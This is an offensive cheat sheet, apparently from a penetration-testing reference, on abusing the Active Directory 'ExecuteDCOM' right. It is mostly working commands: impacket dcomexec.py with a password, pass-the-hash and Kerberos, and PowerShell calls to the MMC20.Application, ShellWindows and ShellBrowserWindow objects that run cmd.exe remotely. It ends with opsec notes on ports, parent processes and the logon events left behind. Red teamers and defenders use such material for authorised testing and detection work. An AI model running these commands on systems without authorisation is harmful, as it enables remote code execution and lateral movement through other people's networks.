ExecuteDCOM
Principal has the right to execute DCOM objects on the target computer, enabling remote code execution.
Applies to: User/Group β Computer
Linux Abuse
dcomexec.py (password)
dcomexec.py <domain>/<username>:'<password>'@<target>
dcomexec.py (pass-the-hash)
dcomexec.py -hashes :<ntlm-hash> <domain>/<username>@<target>
dcomexec.py (specific DCOM object)
# Objects: MMC20, ShellWindows, ShellBrowserWindow (default: MMC20)
dcomexec.py -object MMC20 <domain>/<username>:'<password>'@<target> 'whoami'
dcomexec.py -object ShellWindows <domain>/<username>:'<password>'@<target> 'whoami'
dcomexec.py (Kerberos)
KRB5CCNAME=<ccache> dcomexec.py -k -no-pass <domain>/<username>@<target>
Windows Abuse
MMC20.Application
$com = [Activator]::CreateInstance([Type]::GetTypeFromProgID("MMC20.Application","<target>"))
$com.Document.ActiveView.ExecuteShellCommand("cmd.exe",$null,"/c whoami > C:\output.txt","7")
ShellWindows
$com = [Activator]::CreateInstance([Type]::GetTypeFromCLSID("9BA05972-F6A8-11CF-A442-00A0C90A8F39","<target>"))
$item = $com.Item()
$item.Document.Application.ShellExecute("cmd.exe","/c whoami > C:\output.txt","C:\Windows\System32",$null,0)
ShellBrowserWindow
$com = [Activator]::CreateInstance([Type]::GetTypeFromCLSID("C08AFD90-F2A1-11D1-8455-00A0C91F3880","<target>"))
$com.Document.Application.ShellExecute("cmd.exe","/c whoami > C:\output.txt","C:\Windows\System32",$null,0)
Opsec
- DCOM uses port 135 (RPC endpoint mapper) + dynamic high ports
- Spawns child processes under
mmc.exe,explorer.exe, orsvchost.exedepending on object used - ShellWindows/ShellBrowserWindow require an existing Explorer session on target (typically works on workstations, not servers)
- Generates Event ID 4624 (logon type 3) β no dedicated DCOM event log